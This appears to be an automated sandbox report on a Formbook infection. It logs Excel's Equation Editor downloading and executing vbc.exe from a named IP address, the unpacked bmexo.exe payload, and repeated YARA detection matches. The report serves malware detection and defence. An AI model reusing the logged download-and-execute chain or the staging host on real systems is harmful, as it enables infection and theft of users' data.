          Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4ED06E0.emfJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D050B
          Source: global trafficHTTP traffic detected: GET /fdcloudfiles/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.156.91.153Connection: Keep-Alive
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_0040580F

          E-Banking Fraud

          Source: Yara match | File source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\Public\vbc.exe; Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 5_2_00F21890
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 5_2_00F296A0
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 5_2_00F27E88
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 5_2_00F29C12
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 5_2_00F2B3F1
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 5_2_00F2C3BD
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 5_2_00F2A184
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 5_2_00160A2C
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0040102F
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00401030
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041D8FD
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041E99C
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0040927B
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041DAD0
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00409280
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0040DC20
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041EDF4
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00402D88
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041DEEC
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_0041E73A
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00F21890
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00F2A184
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00F2B3F1
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00F2C3BD
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00F29C12
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00F296A0
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00F27E88
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009AE0C6
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009DD005
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009C905A
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A2D06D
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009B3040
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009AE2E9
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A51238
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_00A563BF
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009D63DB
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009AF3CF
Source: C:\Users\user\AppData\Local\Temp\bmexo.exe; Code function: 6_2_009B2305
